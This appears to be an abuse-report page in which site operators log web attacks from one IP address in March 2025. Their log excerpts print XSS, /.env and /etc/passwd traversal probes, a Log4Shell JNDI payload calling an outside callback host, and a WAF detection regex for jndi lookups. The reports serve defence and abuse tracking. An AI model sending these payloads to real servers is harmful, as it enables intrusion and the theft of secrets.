๐ฎ๐ฉ
penjaga BRIN
2025-03-30 19:12:43
(1 year ago)
nginx-alfa-240
Web App Attack
๐ฉ๐ช
london2038.com
2025-03-30 13:46:25
(1 year ago)
Probing for exploits
82.25.104.91 - - [30/Mar/2025:15:46:20 +0200] "GET /_ignition/scripts/--%3E%3Cs ...
show more
Probing for exploits
82.25.104.91 - - [30/Mar/2025:15:46:20 +0200] "GET /_ignition/scripts/--%3E%3Csvg%20onload=alert%28document.domain%29%3E HTTP/1.1" 422 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
82.25.104.91 - - [30/Mar/2025:15:46:24 +0200] "GET /.env HTTP/1.1" 422 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Tokai/21.1.294403 Version/17.2 Safari/605.1.15"
show less
Hacking
Web App Attack
๐บ๐ธ
vestibtech
2025-03-20 18:15:29
(1 year ago)
82.25.104.91 - - [20/Mar/2025:12:15:29 -0600] "GET /public/index.php/home/file/user_pics HTTP/1.1" 4 ...
show more
82.25.104.91 - - [20/Mar/2025:12:15:29 -0600] "GET /public/index.php/home/file/user_pics HTTP/1.1" 404 10743 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
...
show less
Web App Attack
๐บ๐ธ
TPI-Abuse
2025-03-20 16:27:48
(1 year ago)
(mod_security) mod_security (id:248270) triggered by 82.25.104.91 (srv745925.hstgr.cloud): 1 in the ...
show more
(mod_security) mod_security (id:248270) triggered by 82.25.104.91 (srv745925.hstgr.cloud): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Mar 20 12:27:41.156930 2025] [security2:error] [pid 18685:tid 18685] [client 82.25.104.91:54820] [client 82.25.104.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\$\\\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\\\$\\\\{(?:lower|upper)):" at ARGS:x. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||globalsolutions.technology|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "globalsolutions.technology"] [uri "/"] [unique_id "Z9xB_ahMsBlGA0R50_H_dgAAABA"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
MO webmaster
2025-03-19 14:22:00
(1 year ago)
ActionDispatch::Http::MimeNegotiation::InvalidType ("*/${jndi:ldap://${:-695}${:-498}.${hostName}.ac ...
show more
ActionDispatch::Http::MimeNegotiation::InvalidType ("*/${jndi:ldap://${:-695}${:-498}.${hostName}.accept.cvclco05jdpcim9v7pa0h9j9ztfsosgqn.oast.online}" is not a valid MIME type):
show less
Hacking
Bad Web Bot
๐ซ๐ฎ
tjs
2025-03-18 23:05:00
(1 year ago)
log4j attack / scan
Hacking
Web App Attack
๐ฆ๐บ
MAGIC
2025-03-18 14:02:15
(1 year ago)
VM5 Bad user agents ignoring web crawling rules. Draing bandwidth
DDoS Attack
Bad Web Bot
๐ฉ๐ช
london2038.com
2025-03-17 11:40:25
(1 year ago)
Probing for exploits
82.25.104.91 - - [17/Mar/2025:12:40:19 +0100] "GET /static///////../../../../et ...
show more
Probing for exploits
82.25.104.91 - - [17/Mar/2025:12:40:19 +0100] "GET /static///////../../../../etc/passwd HTTP/1.1" 400 157 "-" "-"
82.25.104.91 - - [17/Mar/2025:12:40:20 +0100] "GET ///../app.js HTTP/1.1" 400 157 "-" "-"
show less
Hacking
Web App Attack
Anonymous
2025-03-17 11:37:52
(1 year ago)
$f2bV_matches
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2025-03-15 19:10:50
(1 year ago)
(mod_security) mod_security (id:248270) triggered by 82.25.104.91 (srv745925.hstgr.cloud): 1 in the ...
show more
(mod_security) mod_security (id:248270) triggered by 82.25.104.91 (srv745925.hstgr.cloud): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Mar 15 15:10:45.003514 2025] [security2:error] [pid 9397:tid 9423] [client 82.25.104.91:44510] [client 82.25.104.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\$\\\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\\\$\\\\{(?:lower|upper)):" at ARGS:x. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||cqaie.aafm.us|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "cqaie.aafm.us"] [uri "/"] [unique_id "Z9XQtH6awCMxUtnKCRDYcwAAAIY"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
MO webmaster
2025-03-14 10:46:00
(1 year ago)
ActionDispatch::Http::MimeNegotiation::InvalidType ("../../../../../../../../etc/passwd{{" is not a ...
show more
ActionDispatch::Http::MimeNegotiation::InvalidType ("../../../../../../../../etc/passwd{{" is not a valid MIME type):
show less
Hacking
Bad Web Bot
๐ฆ๐บ
MAGIC
2025-03-14 10:01:58
(1 year ago)
VM5 Bad user agents ignoring web crawling rules. Draing bandwidth
DDoS Attack
Bad Web Bot
๐ฎ๐ฉ
penjaga BRIN
2025-03-10 17:12:56
(1 year ago)
-240
Web App Attack
๐ฉ๐ช
london2038.com
2025-03-10 11:18:10
(1 year ago)
Malformed or malicious web request
82.25.104.91 - - [10/Mar/2025:12:18:09 +0100] "POST /webadm/?q=mo ...
show more
Malformed or malicious web request
82.25.104.91 - - [10/Mar/2025:12:18:09 +0100] "POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1" 404 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0"
show less
Hacking
Web App Attack
Anonymous
2025-03-09 06:05:27
(1 year ago)
Ports: 80,443; Direction: 0; Trigger: LF_CUSTOMTRIGGER
Brute-Force
SSH